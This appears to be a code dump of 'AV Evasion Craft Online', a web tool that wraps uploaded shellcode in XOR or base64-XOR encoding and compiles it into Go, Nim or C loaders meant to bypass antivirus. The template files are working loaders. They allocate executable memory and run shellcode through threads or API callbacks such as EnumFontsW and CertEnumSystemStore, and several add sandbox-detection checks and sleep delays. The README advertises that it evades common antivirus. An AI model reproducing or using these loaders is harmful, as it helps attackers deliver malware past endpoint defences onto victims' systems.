code-splitting 14 | // this generates a separate chunk (about.[hash].js) for this route 15 | // which is lazy-loaded when the route is visited. 16 | component: () => 17 | import(/* webpackChunkName: "about" */ '../views/AboutView.vue') 18 | } 19 | ] 20 | 21 | const router = createRouter({ 22 | history: createWebHistory(import.meta.env.BASE_URL), 23 | routes 24 | }) 25 | 26 | export default router 27 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/style-dark.css: -------------------------------------------------------------------------------- 1 | @charset "utf-8"; 2 | /* Please ❤ this if you like it! */ 3 | /*@import url('https://fonts.googleapis.com/css2?family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap');*/ 4 | 5 | html.dark { 6 | /* el-plus自定义 */ 7 | --el-card-bg-color: #242525; 8 | --el-bg-color-overlay: #242525; 9 | --el-text-color-primary: #ddd; 10 | 11 | /* 自定义 */ 12 | --color: #dddddd; 13 | --background-color: #2b2d2d; 14 | 15 | --bg-header: #242525; 16 | --header-text-color: #c7c0b5; 17 | --bg-footer: #242525; 18 | --el-footer-height: 60px; 19 | --footer-text-color: #ddd; 20 | 21 | --text-color: rgb(219, 213, 204); 22 | --second-text-color: #9f9688; 23 | --link-color: #f96518; 24 | } 25 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/resources/application.yaml: -------------------------------------------------------------------------------- 1 | bypassav: 2 | templates-directory: /home/kali/AVEvasionCraftOnline/template 3 | storage-directory: /home/kali/AVEvasionCraftOnline/download 4 | compilerwork-directory: /home/kali/AVEvasionCraftOnline/compiler 5 | templates-mapping: 6 | go_VirtualAlloc: 7 | loadMethod: 8 | - EMBEDDED 9 | - REMOTE 10 | - LOCAL 11 | transformation: 12 | - base64Xor 13 | - xor 14 | nim_VirtualAlloc: 15 | loadMethod: 16 | - EMBEDDED 17 | - LOCAL 18 | transformation: 19 | - xor 20 | c_VirtualAlloc: 21 | loadMethod: 22 | - EMBEDDED 23 | transformation: 24 | - none 25 | compiler-c: x86_64-w64-mingw32-gcc 26 | compiler-nim: nim 27 | compiler-golang: go 28 | 29 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/dto/ShellcodeUploadDTO.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.dto; 2 | 3 | import lombok.AllArgsConstructor; 4 | import lombok.Getter; 5 | import lombok.NoArgsConstructor; 6 | import lombok.Setter; 7 | import org.springframework.web.multipart.MultipartFile; 8 | 9 | @Getter 10 | @Setter 11 | @NoArgsConstructor 12 | @AllArgsConstructor 13 | public class ShellcodeUploadDTO { 14 | private MultipartFile shellcode; 15 | 16 | private String templateLanguage; 17 | private String templateName; 18 | private String transformation; 19 | private StorageType storageType; 20 | private String additionalParameter; // 文件名或者url 21 | 22 | public enum StorageType { 23 | EMBEDDED, 24 | LOCAL, 25 | REMOTE 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.0.5 h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs= 2 | github.com/andybalholm/brotli v1.0.5/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 3 | github.com/klauspost/compress v1.17.0 h1:Rnbp4K9EjcDuVuHtd0dgA4qNuv9yKDYKK1ulpJwgrqM= 4 | github.com/klauspost/compress v1.17.0/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.51.0 h1:8b30A5JlZ6C7AS81RsWjYMQmrZG6feChmgAolCl1SqA= 8 | github.com/valyala/fasthttp v1.51.0/go.mod h1:oI2XroL+lI7vdXyYoQk03bXBThfFl2cVdIA3Xl7cH8g= 9 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 10 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 11 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.0.5 h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs= 2 | github.com/andybalholm/brotli v1.0.5/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 3 | github.com/klauspost/compress v1.17.0 h1:Rnbp4K9EjcDuVuHtd0dgA4qNuv9yKDYKK1ulpJwgrqM= 4 | github.com/klauspost/compress v1.17.0/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.51.0 h1:8b30A5JlZ6C7AS81RsWjYMQmrZG6feChmgAolCl1SqA= 8 | github.com/valyala/fasthttp v1.51.0/go.mod h1:oI2XroL+lI7vdXyYoQk03bXBThfFl2cVdIA3Xl7cH8g= 9 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 10 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 11 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/FileUtilsTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.io.IOException; 6 | 7 | import static org.junit.jupiter.api.Assertions.*; 8 | 9 | class FileUtilsTest { 10 | 11 | @Test 12 | void saveFileZIP() throws IOException { 13 | 14 | String filePath = "C:\\1bypassAVOnline\\calc.exe"; 15 | String outputZipFilePath = "C:\\1bypassAVOnline\\download\\Test\\"; 16 | // System.out.println(FileUtils.saveFileZIP(filePath, 17 | // "C:\\1bypassAVOnline\\calc.bin", outputZipFilePath)); 18 | } 19 | 20 | @Test 21 | void readFileBytes() { 22 | System.out.println(FileUtils.readFileBytes("C:\\1bypassAVOnline\\calc.bin")); 23 | 24 | } 25 | 26 | @Test 27 | void copyFile() { 28 | } 29 | 30 | @Test 31 | void saveFileBytes() { 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/config/BypassAVConfigProperties.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.config; 2 | 3 | import com.fasterxml.jackson.annotation.JsonIgnore; 4 | import lombok.Getter; 5 | import lombok.Setter; 6 | import org.springframework.boot.context.properties.ConfigurationProperties; 7 | import org.springframework.stereotype.Component; 8 | 9 | import java.util.List; 10 | import java.util.Map; 11 | 12 | @Getter 13 | @Setter 14 | @Component 15 | @ConfigurationProperties(prefix = "bypassav") 16 | public class BypassAVConfigProperties { 17 | 18 | @JsonIgnore 19 | private String templatesDirectory; 20 | @JsonIgnore 21 | private String storageDirectory; 22 | @JsonIgnore 23 | private String compilerWorkDirectory; 24 | 25 | private Map>> templatesMapping; 26 | @JsonIgnore 27 | private String compilerC; 28 | @JsonIgnore 29 | private String compilerNim; 30 | @JsonIgnore 31 | private String compilerGolang; 32 | 33 | 34 | } 35 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "vite-vue-template", 3 | "private": true, 4 | "version": "0.0.0", 5 | "type": "module", 6 | "scripts": { 7 | "dev": "vite", 8 | "build": "vite build", 9 | "preview": "vite preview", 10 | "lint": "eslint --ext .js,.vue --ignore-path .gitignore --fix src", 11 | "format": "prettier --write ." 12 | }, 13 | "dependencies": { 14 | "@element-plus/icons-vue": "^2.3.1", 15 | "@vueuse/core": "^9.2.0", 16 | "axios": "^0.27.2", 17 | "element-plus": "^2.4.4", 18 | "js-cookie": "^3.0.1", 19 | "normalize.css": "^8.0.1", 20 | "vue": "^3.2.37", 21 | "vue-router": "^4.0.3", 22 | "vuex": "^4.0.2" 23 | }, 24 | "devDependencies": { 25 | "@vitejs/plugin-vue": "^3.1.0", 26 | "eslint": "^8.23.1", 27 | "eslint-config-prettier": "^8.5.0", 28 | "eslint-plugin-vue": "^9.5.1", 29 | "less": "^4.1.3", 30 | "less-loader": "^11.0.0", 31 | "prettier": "^2.7.1", 32 | "sass": "^1.32.7", 33 | "sass-loader": "^12.0.0", 34 | "vite": "^3.1.0" 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 yutianqaq 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/vite.config.js: -------------------------------------------------------------------------------- 1 | import { defineConfig, loadEnv } from 'vite' 2 | import vue from '@vitejs/plugin-vue' 3 | import { resolve } from 'path' 4 | 5 | const config_dev = loadEnv('development', './') 6 | const config_pro = loadEnv('production', './') 7 | // https://vitejs.dev/config/ 8 | export default defineConfig({ 9 | plugins: [vue()], 10 | server: { 11 | open: false, 12 | proxy: { 13 | // 匹配到的时开发环境 14 | '/dev-api': { 15 | target: config_dev.VITE_API_URL, //后台服务地址 16 | changeOrigin: true, 17 | //重写,/api开头的替换成空字符串,即去掉接口中去掉这个字符串 18 | rewrite: path => path.replace(/^\/dev-api/, '') 19 | }, 20 | // 拦截请求地址包含/api,匹配到的是生产环境 21 | '/api': { 22 | target: config_pro.VITE_API_URL, //后台服务地址 23 | changeOrigin: true, 24 | // 重写,/api开头的替换成空字符串,即去掉接口中去掉这个字符串 25 | rewrite: path => path.replace(/^\/api/, '') 26 | } 27 | } 28 | }, 29 | resolve: { 30 | // 别名src下的资源路径都可以以@/替换 31 | alias: [ 32 | { 33 | find: '@', 34 | replacement: resolve(__dirname, 'src') 35 | } 36 | ], 37 | // 忽略.vue后缀 38 | extensions: ['.js', '.ts', '.jsx', '.tsx', '.json', '.vue'] 39 | } 40 | }) 41 | -------------------------------------------------------------------------------- /template/nim/nim_VirtualAlloc/xor/LOCAL/nim_VirtualAlloc.nim: -------------------------------------------------------------------------------- 1 | {.emit: """ 2 | 3 | #include "windows.h" 4 | #include 5 | 6 | #pragma warning(disable:4996) 7 | 8 | void XOR(char* data, size_t data_len, char* key, size_t key_len) { 9 | int j = 0; 10 | 11 | for (size_t i = 0; i < data_len; i++) { 12 | if (j == key_len) j = 0; 13 | 14 | data[i] = data[i] ^ key[j]; 15 | j++; 16 | } 17 | } 18 | 19 | int x2Ldrx() { 20 | 21 | FILE* fp; 22 | BOOL rv; 23 | HANDLE th; 24 | SIZE_T size; 25 | void* exec_mem; 26 | DWORD oldprotect = 0; 27 | 28 | char key[] = { {{Key}} }; 29 | 30 | fp = fopen("{{LOCAL_FILENAME}}", "rb"); 31 | fseek(fp, 0, SEEK_END); 32 | size = ftell(fp); 33 | fseek(fp, 0, SEEK_SET); 34 | exec_mem = VirtualAlloc(0, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 35 | 36 | fread(exec_mem, size, 1, fp); 37 | XOR((char*)exec_mem, size, key, sizeof(key)); 38 | 39 | rv = VirtualProtect(exec_mem, size, PAGE_EXECUTE_READ, &oldprotect); 40 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0); 41 | WaitForSingleObject(th, -1); 42 | 43 | return 0; 44 | } 45 | """.} 46 | proc x2Ldr(): int 47 | {.importc: "x2Ldrx", nodecl.} 48 | 49 | when isMainModule: 50 | var result = x2Ldr() -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/enums/Result.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.enums; 2 | 3 | import lombok.AllArgsConstructor; 4 | import lombok.Data; 5 | import lombok.NoArgsConstructor; 6 | 7 | import java.io.Serializable; 8 | 9 | /** 10 | * 接口统一返回包装类 11 | */ 12 | @Data 13 | @NoArgsConstructor 14 | @AllArgsConstructor 15 | public class Result implements Serializable { 16 | public static final long serialVersionUID = 42L; 17 | public static final String CODE_SUCCESS = "200"; 18 | public static final String CODE_SYS_ERROR = "500"; 19 | 20 | public String code; 21 | public String msg; 22 | public Object data; 23 | 24 | public static Result success() { 25 | return new Result(CODE_SUCCESS, "操作成功", null); 26 | } 27 | 28 | public static Result success(Object data) { 29 | return new Result(CODE_SUCCESS, "操作成功", data); 30 | } 31 | 32 | public static Result error(String code, String msg) { 33 | return new Result(code, msg, null); 34 | } 35 | 36 | public static Result error(String msg) { 37 | return new Result(CODE_SYS_ERROR, msg, null); 38 | } 39 | 40 | public static Result error() { 41 | return new Result(CODE_SYS_ERROR, "系统错误", null); 42 | } 43 | 44 | } 45 | -------------------------------------------------------------------------------- /template/nim/nim_VirtualAlloc/xor/EMBEDDED/nim_VirtualAlloc.nim: -------------------------------------------------------------------------------- 1 | import winim/lean 2 | import os 3 | 4 | proc xorEncrypt[I, J, byte](code: array[I, byte], key: array[J, byte]): array[I, byte] = 5 | var result: array[I, byte] 6 | for i in 0 ..< code.len: 7 | result[i] = code[i] xor key[i mod key.len] 8 | return result 9 | 10 | proc Ldr1[I, T](shellcode: array[I, T]): void = 11 | 12 | var pHandle: HANDLE = GetCurrentProcess() 13 | 14 | let rPtr = VirtualAllocEx( 15 | pHandle, 16 | NULL, 17 | cast[SIZE_T](shellcode.len), 18 | MEM_COMMIT, 19 | PAGE_READWRITE 20 | ) 21 | var key: array[10, byte] = [byte {{Key}} ] 22 | 23 | var shellcode: array[{{Len}}, byte] = xorEncrypt(shellcode, key) 24 | 25 | var bytesWritten: SIZE_T 26 | let wSuccess = WriteProcessMemory( 27 | pHandle, 28 | rPtr, 29 | unsafeAddr shellcode, 30 | cast[SIZE_T](shellcode.len), 31 | addr bytesWritten 32 | ) 33 | 34 | var oldProtectCalc: DWORD 35 | let rv = VirtualProtect(rPtr, shellcode.len, PAGE_EXECUTE_READ, cast[PDWORD](addr(oldProtectCalc))) 36 | 37 | if rv != 0: 38 | var tHandle = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](rPtr), nil, 0, nil) 39 | WaitForSingleObject(tHandle, -1) 40 | 41 | when defined(windows): 42 | 43 | var shellcode: array[{{Len}}, byte] = [ 44 | byte {{Shellcode}} ] 45 | 46 | when isMainModule: 47 | let path = getAppFilename() 48 | if path[10] == '\\': 49 | quit(1) 50 | else: 51 | Ldr1(shellcode) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | > 免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。 2 | 3 | # AV Evasion Craft Online 4 | 5 | **不要搭建在公网中** 有问题请先看 [issues](https://github.com/yutianqaq/AVEvasionCraftOnline/issues) 6 | 7 | 代码维护/新增请参考 [先知社区-Golang 免杀与AV Evasion Craft Online 在线免杀生成平台](https://xz.aliyun.com/t/13411?time__1311=mqmxnDBQqDq7wq05d4%2BxCuwCxu7faQQY4D#toc-6:~:text=%E5%A2%9E%E5%8A%A0%E4%B8%80%E5%AE%9A%E9%9A%BE%E5%BA%A6-,Go%20%E5%85%8D%E6%9D%80,-%E5%B9%B3%E5%8F%B0%E8%87%AA%E5%B8%A6) 8 | 9 | ![image-20240124190806863](images/image-20240124190806863.png) 10 | 11 | 可绕过常见杀软 12 | 13 | ## 特点 14 | ​ 1、轻松使用 15 | - 通过简单的上传操作,用户可以生成免杀 Payload,无需手动配置和编码。 16 | 17 | 2、时间节省 18 | - 减少协作时的环境配置和手动操作,提高效率。 19 | 20 | 3、模板化 21 | - 用户可以通过配置文件快速应用不同的载入方式,增加生成的 Payload 的多样性。 22 | 23 | 24 | 生成的压缩包密码为 yutian 25 | 26 | 27 | 支持编译 nim、go、c 语言 28 | 29 | 支持 3 种 shellcode 存储方式(内嵌、本地、远程) 30 | 31 | 2024年3月10日 更新 8 种加载方式 (Golang) 32 | 33 | ![PixPin_2024-03-10_16-41-50](images/012.png) 34 | 35 | ![PixPin_2024-03-10_17-45-02](images/013.png) 36 | 37 | 38 | 39 | # 安装 40 | 41 | [详细版本](https://github.com/yutianqaq/AVEvasionCraftOnline/wiki) 42 | 43 | 模板不定期更新,启动后端时请指定参数 44 | 45 | 下载后,修改 application.yaml 中的路径(**非常重要**) 46 | 47 | ![image-20240131132406380](images/image-20240131132406380.png) 48 | 49 | 接着指定参数,jar 包名称需要更改。之后访问对应的端口即可 50 | 51 | `java -jar -Dspring.config.location=application.yaml AVEvasionCraftOnline.jar --server.port=80` 52 | 53 | 54 | 55 | # 参考 56 | 57 | https://github.com/wsheeny/vite-vue-template 58 | 59 | https://github.com/r00tSe7en/get_AV 60 | 61 | https://github.com/qi4L/CallbackLoader 62 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/EMBEDDED/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "golang.org/x/sys/windows" 5 | "time" 6 | "unsafe" 7 | "math/rand" 8 | "os" 9 | 10 | "syscall" 11 | ) 12 | 13 | func XorDecrypt(plaintext []byte, key []byte) []byte { 14 | ciphertext := make([]byte, len(plaintext)) 15 | keyLength := len(key) 16 | for i, byte := range plaintext { 17 | keyByte := key[i % keyLength] 18 | encryptedByte := byte ^ keyByte 19 | ciphertext[i] = encryptedByte 20 | } 21 | return ciphertext 22 | } 23 | 24 | func DecryptData(v2 []byte) []byte { 25 | key := []byte{{{Key}}} 26 | v222 := XorDecrypt(v2, key) 27 | return v222 28 | } 29 | 30 | func WriteMemory(inbuf []byte, destination uintptr) { 31 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 32 | writePtr := unsafe.Pointer(destination + uintptr(index)) 33 | v := (*byte)(writePtr) 34 | *v = inbuf[index] 35 | } 36 | } 37 | 38 | func Ldr1(calc []byte) { 39 | 40 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 41 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 42 | calc_len := uintptr(len(calc)) 43 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 44 | WriteMemory(calc, Ptr1) 45 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 46 | } 47 | 48 | 49 | func Sleeeep() { 50 | res := 1 51 | for i := 0; i < 5; i++ { 52 | number := rand.Intn(900) + 100 53 | res *= number 54 | } 55 | time.Sleep(10 * time.Second) 56 | } 57 | 58 | func main() { 59 | 60 | args := os.Args[0] 61 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 62 | os.Exit(0) 63 | } 64 | 65 | Sleeeep() 66 | 67 | ciphertext := []byte{{{Shellcode}}} 68 | 69 | byteData := DecryptData(ciphertext) 70 | 71 | Ldr1(byteData) 72 | } -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/EMBEDDED/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | User32 = syscall.NewLazyDLL("User32.dll") 25 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetDC = User32.NewProc("GetDC") 28 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dc, _, _ := GetDC.Call(NULL) 36 | EnumFontsW.Call(dc, NULL, addr, NULL) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(shellcode []byte) []byte { 51 | key := []byte{{{Key}}} 52 | decryptShellcode := XorDecrypt(shellcode, key) 53 | return decryptShellcode 54 | } 55 | 56 | func main() { 57 | args := os.Args[0] 58 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 59 | os.Exit(0) 60 | } 61 | 62 | ciphertext := []byte{{{Shellcode}}} 63 | byteData := DecryptData(ciphertext) 64 | Callback(byteData) 65 | } 66 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/EMBEDDED/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "encoding/base64" 5 | "golang.org/x/sys/windows" 6 | "time" 7 | "unsafe" 8 | "math/rand" 9 | "os" 10 | 11 | "syscall" 12 | ) 13 | 14 | func XorDecrypt(plaintext []byte, key []byte) []byte { 15 | ciphertext := make([]byte, len(plaintext)) 16 | keyLength := len(key) 17 | for i, byte := range plaintext { 18 | keyByte := key[i % keyLength] 19 | encryptedByte := byte ^ keyByte 20 | ciphertext[i] = encryptedByte 21 | } 22 | return ciphertext 23 | } 24 | 25 | func DecryptData(v2 string) []byte { 26 | key := []byte{{{Key}}} 27 | v22, _ := base64.StdEncoding.DecodeString(v2) 28 | v222 := XorDecrypt(v22, key) 29 | return v222 30 | } 31 | 32 | func WriteMemory(inbuf []byte, destination uintptr) { 33 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 34 | writePtr := unsafe.Pointer(destination + uintptr(index)) 35 | v := (*byte)(writePtr) 36 | *v = inbuf[index] 37 | } 38 | } 39 | 40 | func Ldr1(calc []byte) { 41 | 42 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 43 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 44 | calc_len := uintptr(len(calc)) 45 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 46 | WriteMemory(calc, Ptr1) 47 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 48 | } 49 | 50 | 51 | func Sleeeep() { 52 | res := 1 53 | for i := 0; i < 5; i++ { 54 | number := rand.Intn(900) + 100 55 | res *= number 56 | } 57 | time.Sleep(10 * time.Second) 58 | } 59 | 60 | func main() { 61 | 62 | args := os.Args[0] 63 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 64 | os.Exit(0) 65 | } 66 | 67 | Sleeeep() 68 | 69 | ciphertext := "{{Shellcode}}" 70 | 71 | byteData := DecryptData(ciphertext) 72 | 73 | Ldr1(byteData) 74 | } -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/EMBEDDED/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "golang.org/x/sys/windows" 9 | ) 10 | 11 | const ( 12 | MEM_COMMIT = 0x1000 13 | MEM_RESERVE = 0x2000 14 | PAGE_EXECUTE_READWRITE = 0x40 15 | ) 16 | 17 | var ( 18 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 19 | ntdll = syscall.NewLazyDLL("ntdll.dll") 20 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 21 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 22 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 23 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 24 | ) 25 | 26 | func Callback(shellcode []byte) { 27 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 28 | if err != nil && err.Error() != "The operation completed successfully." { 29 | syscall.Exit(0) 30 | } 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 33 | 34 | } 35 | 36 | func XorDecrypt(plaintext []byte, key []byte) []byte { 37 | ciphertext := make([]byte, len(plaintext)) 38 | keyLength := len(key) 39 | for i, byte := range plaintext { 40 | keyByte := key[i%keyLength] 41 | encryptedByte := byte ^ keyByte 42 | ciphertext[i] = encryptedByte 43 | } 44 | return ciphertext 45 | } 46 | 47 | func DecryptData(shellcode []byte) []byte { 48 | key := []byte{{{Key}}} 49 | decryptShellcode := XorDecrypt(shellcode, key) 50 | return decryptShellcode 51 | } 52 | 53 | func main() { 54 | args := os.Args[0] 55 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 56 | os.Exit(0) 57 | } 58 | 59 | ciphertext := []byte{{{Shellcode}}} 60 | byteData := DecryptData(ciphertext) 61 | Callback(byteData) 62 | } 63 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/EMBEDDED/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | User32 = syscall.NewLazyDLL("User32.dll") 26 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | GetDC = User32.NewProc("GetDC") 29 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dc, _, _ := GetDC.Call(NULL) 37 | EnumFontsW.Call(dc, NULL, addr, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(v2 string) []byte { 52 | key := []byte{{{Key}}} 53 | v22, _ := base64.StdEncoding.DecodeString(v2) 54 | v222 := XorDecrypt(v22, key) 55 | return v222 56 | } 57 | 58 | func main() { 59 | args := os.Args[0] 60 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 61 | os.Exit(0) 62 | } 63 | 64 | ciphertext := "{{Shellcode}}" 65 | byteData := DecryptData(ciphertext) 66 | 